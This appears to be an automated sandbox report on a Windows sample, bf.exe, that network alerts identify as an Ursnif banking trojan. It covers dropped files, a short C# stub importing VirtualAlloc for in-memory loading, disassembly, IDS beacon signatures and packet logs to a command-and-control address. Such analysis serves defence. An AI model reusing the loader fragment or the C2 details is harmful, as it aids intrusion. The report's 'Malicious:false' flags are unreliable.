                                      SHA-256:26533FAEFCD5B67D4B81CC17D362A2A238120A044B92C4CB55E662CFE4C2C085
                                      SHA-512:B4A0A2B0D8DC98F78E68476EC113B1872A2F51C9D4AC9A3AD84DA2697501C3CC2349B1772B4DCD650E91CE9F76A46B0678603A204ABBB2DF2F21E7960FEBD16A
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4rgoqrxw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.071104180333077
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqKPN5Dlq5J:+RI+ycuZhNiakSKPNnqX
                                      MD5:77F267516B1EB24FF441C7AEFFE7CEEA
                                      SHA1:919FD845A3D90A83436CD074A4859048C5B8B64F
                                      SHA-256:054F1B995460C13C56857907432CB6A8F7C02F68BF403D75DF681011D52B8640
                                      SHA-512:4B787F2F398D6E56E820D37D83E4586E9D927A4C8B2EAD2C91BF9057D392CFDFFCAAA79E5B663DE4DD7DF8366D95766A9A956E18B479DE10241A80986E92119F
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0985185644301043
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2lxmGak7YnqqFlxmXPN5Dlq5J:+RI+ycuZhN0xmGakSfxmXPNnqX
                                      MD5:E73626B90519176EF74EEFA1FBBF8359
                                      SHA1:B83852A543258A18918D5FCAC5B70AB5BA0D2B93
                                      SHA-256:3CBC786D97DE3D7A7F7F9E537EB4143D0085294DF5A1A5F80059D4644397BC45
                                      SHA-512:02D0C8C4FF7ABE946BA74DA1C0FF87063DC27EB25F062D8E59A9AF5CD7CE6FA98C5936DBA4EE1888702A70287D94B95F8BE624852F331455E8920819F61D0E00
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 16:31:10 2022, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1320
                                      Entropy (8bit):3.9871089313851615
                                      Encrypted:false
                                      SSDEEP:24:HMnW9BiyQr68uHghKdNII+ycuZhN0xmGakSfxmXPNnq9hgd:KsiXuiKdu1ulWa3iq9y
                                      MD5:34E8D570049C9D06F2FF7C67BB1CE119
                                      SHA1:CFC0D654192DD0A7F2B6791AD807B30040F62283
                                      SHA-256:1F149258DAFCB5E28457E7290144535E4A82EE26B50707128325DB8ABEDEC660
                                      SHA-512:FDE97C0EB9559A196EF12B4C91CA2C0981A9F75991430C6759E24BBD03709A806D270BE6458B6A13CAA04D674FC23D93F3CE34E0185243CDCA58F158CD1ABB0B
                                      Malicious:false
                                      Preview:L...N=Hc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP................6&....n.N....Y..........5.......C:\Users\user\AppData\Local\Temp\RESE2A5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 16:31:12 2022, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1320
                                      Entropy (8bit):3.9582729102086303
                                      Encrypted:false
                                      SSDEEP:24:HynW9Bit0iuuH5hKdNII+ycuZhNiakSKPNnq9hgd:UsitwunKdu1ulia3mq9y
                                      MD5:8C3DC050387A0493058D36D4B6CF27B1
                                      SHA1:C88C189BBA9142F115A3A17D15A9B422B56D37D3
                                      SHA-256:CB62F45C1C604DFB9C20DF39F2071D92D6C48BF98D668D356D3E0CF764434AC8
                                      SHA-512:29DCB6B3FA9333F4DB07DF839AF10638859AD132690E9476B532DA7BF35FA51E5C723D05807073620B66F29AA42C33DD38498D89EA43E12FD24B68828E1BFEFC
                                      Malicious:false
                                      Preview:L...P=Hc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP...............w.gQk..O.A...............5.......C:\Users\user\AppData\Local\Temp\RESEB8E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):400
                                      Entropy (8bit):4.978058994390849
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuYl8HPMRSRa+eNMjSSRru+LjGVZfmaSRNEolEimZlRBPFQy:V/DTLDfuJ9eg5ru+Ly8yWEPlRBiy
                                      MD5:F31A91CB873D422F30E84BFC6F0E4919
                                      SHA1:87946E5B050BC8C66C9F04EBB9F82E210522D8EE
                                      SHA-256:91AF8FC99B650C87F7C49FAA1E0499F673E034ED712EB62782CFACBDF8329F84
                                      SHA-512:242E12D8C01EF5BF6866FC09BD8A4AB9FB6C7EA1AC4BEAD56610DB30F15F0C7B38D7DA8706AB4BB8AD5647D5B2CCFB9717B85324CA0099C6DCDD7FDE13E5906B
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace gwrevlnvsd.{. public class qlmb. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ymctti,uint jwdycptleij);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr kdqbriigsxr,uint hudaj,uint wtj,uint gyvhd);.. }..}.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                      Category:dropped
                                      Size (bytes):353
                                      Entropy (8bit):5.190119417850032
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGFzxs7+AEszI923fGA:p37Lvkmb6KzuWZE2j
                                      MD5:6F676A14F55792FCAF9AB8D3BC3930D3
                                      SHA1:C2FFBC5923D1AE477656A42CF3E983524AFD5687
                                      SHA-256:FBA75ABB7F20F45450B907669B0A0D01A02D060A647A1E14425338A3CB32A807
                                      SHA-512:D76EB02D9B0A4551FCC56485E85FA8992A8920D2361CBB4D9D721F2804BEF087B9BB603CA32EE8CB5EAE591F12C14D8D7578BB476C2D5FC385867D3D4148C60F
                                      Malicious:false
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\n2sgiaoa.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.604625908121872
                                      Encrypted:false
                                      SSDEEP:48:6CXQ3r5BAbBicLCL1Wh4JeL31ulia3mq:8b5BiLVuEK
                                      MD5:D6661E74516E95B8506921C266FCC378
                                      SHA1:D4A317550C91B8D1BAC27056A2D176D2A46195E7
                                      SHA-256:B86245487032D5B0AB8C861DC33CF96333D046394F3A4CB83E586B92504BF63C
                                      SHA-512:6BB01F1FCD2617BF8BFEB7757278ECD3A5F2A2FC46D72661E148E485BFB511B8E6C483794D444C98573BFB655FC12389331DDD89E268D64BBAF8361A3F957215
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P=Hc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0............... ...................................... >............ P............ X.....P ......e.........k.....r.....~.....................e. ...e...!.e.%...e.......*.....3.3.....>.......P.......X...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):850
                                      Entropy (8bit):5.294801983238796
                                      Encrypted:false
                                      SSDEEP:12:xKIR37Lvkmb6KzuWZE2CKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzvE2CKaM5DqBVKVrdFAMBJTH
                                      MD5:E21C14E505268332566B043E3A794256
                                      SHA1:F402FC38AAD9C5B16B90C809E71CE61FBD5B6E53
                                      SHA-256:568B3CC6ED8389B85718933FE231DB4152F86EC9865A81C6E2284D3DB23E1710
                                      SHA-512:D50F72A3E315A1C8FED7B20B35106AC4AB5FC012C3B0AB6F1B5A2EF30D08518DAA93D14559D39B2A785B9E9180F072A4072E69670DA49D4BCC6889BF245EB11F
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\n2sgiaoa.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.519660398973527
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:bf.exe
                                      File size:37888
                                      MD5:b7ce4f9f6ecd85bb5edbb6964226fdb6
                                      SHA1:12b28a42e960dfc522348eba37b00ea74a0df527
                                      SHA256:bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
                                      SHA512:1f5588d5b0816bbfc51394f434a9a80a96c68b66ca86a6a3cd53d64bf6a63751902c5f782a15522749231022c2695c6df7fbc604ae1d242f21554269f6d31e86
                                      SSDEEP:768:7QLm41fM01vAoyRdq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiuU:7L41fMSvVAdqlaPGhVMq2LpeReOb2Pmm
                                      TLSH:FD03D1A76BA004BAC9D383353A396685DF441332423958E0E7BB4A398BD6C4FD56F713
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
                                      Icon Hash:00828e8e8686b000
                                      Entrypoint:0x40182f
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:1640d668d1471f340cbe565fe63522f6
                                      Instruction
                                      push esi
                                      xor esi, esi
                                      push esi
                                      push 00400000h
                                      push esi
                                      call dword ptr [0040203Ch]
                                      mov dword ptr [00403160h], eax
                                      cmp eax, esi
                                      je 00007F3B38DDEC97h
                                      push esi
                                      call dword ptr [00402008h]
                                      mov dword ptr [00403170h], eax
                                      call dword ptr [00402044h]
                                      call 00007F3B38DDE8A9h
                                      push dword ptr [00403160h]
                                      mov esi, eax
                                      call dword ptr [00402040h]
                                      push esi
                                      call dword ptr [00402048h]
                                      pop esi
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      push ebx
                                      push esi
                                      mov esi, eax
                                      mov eax, dword ptr [00403180h]
                                      mov ecx, dword ptr [esi+3Ch]
                                      mov ecx, dword ptr [ecx+esi+50h]
                                      lea edx, dword ptr [eax-69B24F45h]
                                      not edx
                                      lea ecx, dword ptr [ecx+eax-69B24F45h]
                                      push edi
                                      and ecx, edx
                                      lea edx, dword ptr [ebp-08h]
                                      push edx
                                      lea edx, dword ptr [ebp-04h]
                                      push edx
                                      add eax, 964DA0FCh
                                      push eax
                                      push ecx
                                      call 00007F3B38DDEEFDh
                                      test eax, eax
                                      jne 00007F3B38DDECCCh
                                      mov edi, dword ptr [ebp-04h]
                                      push esi
                                      push edi
                                      call 00007F3B38DDEFD3h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDECA8h
                                      mov esi, dword ptr [edi+3Ch]
                                      add esi, edi
                                      push esi
                                      call 00007F3B38DDE6F4h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDEC97h
                                      push edi
                                      mov eax, esi
                                      call 00007F3B38DDF1D4h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDEC89h
                                      mov esi, dword ptr [esi+28h]
                                      push eax
                                      push 00000001h
                                      add esi, edi
                                      push edi
                                      call esi
                                      test eax, eax
                                      jne 00007F3B38DDEC7Ah
                                      call dword ptr [0000202Ch]
                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2008 SP1 build 30729
                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0x20e8           0x50          .rdata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5000           0x10          .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6000           0xd8          .reloc
                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0xa8          .rdata
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                       Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                       .text   0x1000           0x1000        0x1000    False     0.718017578125      data       6.515539058364033    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rdata  0x2000           0x4c0         0x600     False     0.4635416666666667  data       4.488955985688776    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .data   0x3000           0x194         0x200     False     0.056640625         data       0.12227588125913882  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .bss    0x4000           0x2dc         0x400     False     0.7607421875        data       6.3016514258390215   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .rsrc   0x5000           0x10          0x200     False     0.02734375          data       0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .reloc  0x6000           0x8000        0x7200    False     0.9711143092105263  data       7.860073249744783    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       DLL           Import
                                       ntdll.dll     _snwprintf, memset, NtQuerySystemInformation, _aulldiv
                                       KERNEL32.dll  GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                                       ADVAPI32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorA
                                       Timestamp                 Protocol  SID      Message                                                     Source Port  Dest Port  Source IP    Dest IP
                                       10/13/22-09:30:54.079674  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49696        80         192.168.2.5  45.8.158.104
                                       10/13/22-09:30:55.414317  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49696        80         192.168.2.5  45.8.158.104
                                       Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                      Oct 13, 2022 09:30:53.924936056 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924938917 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924978971 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924981117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925018072 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925021887 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925060987 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925064087 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925103903 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925105095 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925141096 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925147057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925184965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925189972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925225019 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925230026 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925266981 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925271988 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925312996 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925316095 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925354004 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925358057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925396919 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938015938 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938082933 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938117027 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938126087 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938138962 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938160896 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938169003 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938201904 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938210011 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938242912 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938251972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938285112 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938292980 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938325882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938335896 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938369036 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938379049 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938415051 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938417912 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938451052 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938458920 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938494921 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938524961 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938563108 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938657999 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938694954 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938771963 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938813925 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938816071 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938849926 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938855886 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938925982 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938939095 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938968897 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938968897 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.939007998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.939012051 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.939044952 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980545998 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980614901 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980668068 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980712891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980753899 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980796099 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980799913 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980832100 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980842113 CEST804969645.8.158.104192.168.2.5
